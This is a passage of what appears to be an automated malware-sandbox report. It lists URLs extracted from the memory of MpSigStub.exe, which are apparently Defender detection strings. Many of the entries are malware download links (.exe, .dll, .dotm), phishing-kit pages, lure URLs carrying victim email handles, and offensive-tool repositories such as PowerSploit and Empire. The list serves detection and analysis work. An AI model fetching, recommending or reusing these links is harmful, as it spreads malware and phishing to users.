Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: https://playmesadelsol.com/wp-content/off/rt35.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://plectrum.sebdelaweb.com/mnmn/index.php
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://poOsKYsdcast.oigaprofe.com.mx/wp-includes/sodiumOsKYs_comOsKYspat/src/Core32/ChaCha20/KlrIU4
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://pomf.pw/files/
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://ppam.sslblindado.com/pande.html
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://ppds.anestesi.ulm.ac.id/wp-includes/text/diff/engine/vai/reportdhlnew2.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://preoccupationology.com/thisshit
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://pressionism.xyz/bbc.exe
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://pro-fit.pk/exploit.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://producingemotions.es/settlementstatements242019/cgi-bin/office/index.html
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://produsedecalitate.ro/request.php
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://profdocame.co.vu/1/wp-config/storage/web.app.delve/access/draw9901/8269380-attachment-micros
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: https://provodi.com/snn/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://prt.phosagro.ru/oa_html/rf.jsp?function_id=16181&resp_id=-1&resp_appl_id=-1&security_group_i
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://ps.ks-voicemail.online/?e=richana.nelson
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: https://ps.outlook.com/powershell-liveid
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: https://psychedelicassistedsessions.com/f2ewq5kfmdhcsac.exe-o%appdata%
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://ptpb.pw/jj9a
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://pxlme.me/cytyoc4h
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: https://pypi.python.org/packages/source/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://queentour.co.id/z/s.dot
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://quickbooks.aeymotors.com/soft.dll
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://r0lls-r0yce.com/eft/remit.dotm?raw=true
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://rachelzy.com/yyyy/myoriginlogger.exe
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://radh.ga/konzo/change.php
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://ramashardware.co.za/
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://ramblerimport.com/hz4uhlut5au/yu.html
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: https://rapid.cerner.com:8243/clientapi/v1.0/clients/mnemonic/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/aybiota/mpbh33775/gh-pages/g9wl5dp.ttf
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/elevenpaths/ibombshell/
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/empireproject/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/powershellmafia/powersploit/
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/sharkush/test1/master/calcush.sct
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/wmitoapi/test/master/compiler.zip
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://rawcdn.githack.net/up.php?key=5
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: https://rb.gy/kc5b5e?#ncota
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://rcimshop.com/wp-config-server.php
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	String found in binary or memory: https://realmjoin-backend-staging.azurewebsites.net/api/system/check
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://rebrand.ly/wiy5cm0
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://referralpays.com/aki2root/uzie/actions.php
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://reformationtheology.com/css/reportexcelnew.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://reformationtheology.com/img/reportmaersknew.php
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://register.hiramhousecamp.org/miouadthen/po1820.zip
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://relaja.me/qw5hlk1vcmvqb25azglzywdydxbvlmvz
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://remote.bittorrent.com
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://rewardamericanexpress.blob.core.windows.net/aexp/online.americanexpress.com0smyca
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://rezultmedia.com/css/reportdhlnew.php
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://rezultmedia.com/vendor/laravel/tinker/src/reportexcelnew.php
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://ringco.com.co/cache/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://rnatrixblade.net/nj.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://rollingrockcolumbia.com/wp-admin/admin-ajax.php
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: https://rootca.allianz.com/aapplet
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://rotf.lol/3u6d9443
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://rw.mousewinning.club/?
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080008.xml
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080009.xml
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/900/10010045.xml
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/appPrefId/affPrefId.xml
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: https://s1.ax1x.com/2020/04/28/J4Zp9S.png
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://s15events.azure-automation.net/webhooks?token=
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://s18.picofile.com/d/8435906618/a27ddc7a-8599-479b-9e19-f2fd4b1988c3/setup.exe
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: https://s3-ap-northeast-1.amazonaws.com/update-secure/asmsgrbarb.zip
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://s3-eu-west-1.amazonaws.com/adkooo/
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://s3.amazonaws.com/exec459/exec.tgz
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://s3.us-east-2.amazonaws.com/cotazion.pago/recibo.html
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://sad-goldwasser.62-108-34-75.plesk.page/doc00289?
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://safedental.org/wp-includes/css/report-maerskline.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://safedental.org/wp-includes/ixr/report-pdf.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://safiliti-load.com/ecm/ibm/3166347507/converter.dot
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://scabraldealdun.com/hghgh/aridonorigin.exe
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: https://scalet.publicvm.com/large2/next.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://scaricapag.win/eco
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://screw-malwrhunterteams.com/scanme.txt
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://sddfdfdf.typeform.com/to/vrfwamwx
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://secfile24.top/kd323jasd.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://secure.hotbar.com/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: https://secure.logmeinrescue.com/
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: https://secure.tibia.com/account/?subtopic=accountmanagement
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://securezalink.com/home.jpg/security.ocx
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://selmersax.de/wp-content/themes/rehub/bpge/front/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: https://semalt.com/popups/popup_wow.php?lang=en
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://serv.fkn-srv.xyz/?e=tom.hughes
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://server.voiplogger0365.xyz/?e=csizemore
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://seyedishop.ir/rh1/pmt.php
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: https://shaastraarth.in/bbbg/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://shatha.n-idea.us/moo/
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://shop.asopalav.com/ds/0302.gif
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: https://shoplady.xyz/glsdil.php
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://shoptimes.ro/admin/clienti/opo.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://shreyainfosoft.com/krishnasteelcorporation/next.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://shreyainfosoft.com/shayonajwellers/after.php
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: https://signin.ebay
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://simetrika.com/redirect/zg9uywxklmvhdmvzqgfjy2vsbgvudc5jb20=
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://sis.ieadar.com.br-$r)r/Igreja-master/agendaSec/css/Sq4D0WfbvSitsO.php
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://skripon.com/oozoo/document.php
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: https://smartcheckautos%.com/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://smpn1kunjangkediri.sch.id/wp-content/uploads/upgrabe/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://soft-gps.com/wp-content/plugins/cvuohucwkp/tre/swt.php
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://sotheraho.com/wp-content/fonts/reportexcelnew.php
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: https://southpolefaxnet.ml/number/brand.php
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://southvomes.sozouths.xyz/?e=
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://ssl-proxy.my-addr.org/myaddrproxy.php/http://
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/Juliana.jpg
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/grdmody.jpg
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/msnGRD.jpg
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: https://ssmdevelopers.in/4raxigaptfpm/yu.html
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://staging2.lifebiotic.com/novacms/grassandrocks.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://stampdiato.at/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://staralevator.com/anygas/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://staralevator.com/anygas/nxt.php
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://static.wixstatic.com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://static.wixstatic.com/ugd/859f79_35181f339d694f87870220aa3da46c30.doc
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://statsdev.com/header.jpg
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://statseast.com/login.jpg
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://statsmag.com/apple/log.php
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://statsper.com/footer.jpg
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://statssale.com/header.jpg
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://stepup.pt/sugar6/ww/s.dot
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://stitch-statichosting-prod.s3.amazonaws.com/5ffbf74f106b1ff88367ac90/5ffbf62cd17b985f24b01f73
Source: MpSigStub.exe, 00000026.00000003.18311122933.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://storage.googleapis.com/
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://storage.googleapis.com/gr-bhuj-i7uyrterwr-g6.appspot.com/vbeuryfu.com.us/bv-ury-ey-b
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://storage.googleapis.com/msofficeupdater/MSUpdater.exe
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://storyofusstudios.com/n75oh9tzoyhz/lipa.html
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://stretchbuilder.com/chalkzone/next.php
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://studio.joellemagazine.com/drms/ind.html
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://subahj.linkpc.net/sarah2/next.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://submit-form.com/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://subwaybookreview.com/vl1/sample.doc
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://sumnermail.org/sumnerscools/school.php
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: https://sundersls.weebly.com
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://sunilmaharjan.com.np/cve/cv.exe
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: https://surustore.com/imageY9a
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://sviescfze.com/iaret52086yla/next.php
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://sviescfze.com/ns735tey89dgwmo/next.php
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://sweetsizing.com/vip/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://syr.us/gpn
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/File
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/IamLev1
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/IamLev1x
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://tales.pt/webmail-purchase/reportexcel.php
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://tapro-trgovina.com/slimneweurope/next.php
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://tapro-trgovina.com/yalladg/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: https://techportal.cerner.com/api/validateProjectNumber?projectNumber=
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://tecnicopconline.com/wp-admin/jekbvhub.php
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: https://tegavu.com
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://ternerdrivew.at/3/wwf.dll
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://ternerdrivew.at/3/wwf.exe
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://testweb.public360saas.se:443/biz/v2-pbr/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://thecloud-jewels.com/wp-content/themes/storefront/inc/admin/ms
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://themexoneonline.me/ctkjghgvjtfchgdgdmcmgcxgfxfxfxngcthgcnhtgctgcgcm/hzvzdfbjzbfjbfbb43534wbt
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://themexoneonline.me/timack/rt456475888y8y98yhvhh657467hvkffyufkhmvvhvchcvvmvce7ti7t4irgsejgxr
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://thephotographersworkflow.com/vv/popi.exe
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://thersshy.dynssl.com//
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://thersshy.dynssl.com//post.php
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://thewatch-tv.com/guyofficeaprof/post.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://tiagogalindo.com.br/1/ksu/index.html
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://timbeck.net/redirect/ywxpbmeuc2vyymfulwjhcmj1qgrpbnvszwdhbc5ybw==
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/bptvnhw6
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/j7tx7h8)
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/up77pck
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/y7rku84vscrobj.dll
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/yaozbad7
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://todayutos.info
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://tomamate.si/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://toulousa.com/omg/rockspa.php
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: https://tph786.com/gym/assets/css/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://tr.im/1azmq)
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: https://track.fourtiz.com
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: https://tradingdashboards.com/
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/123?utm_term=
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/aws?utm_term=
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/shook?utm_term=
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/strik?utm_term=
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/123?utm_term=
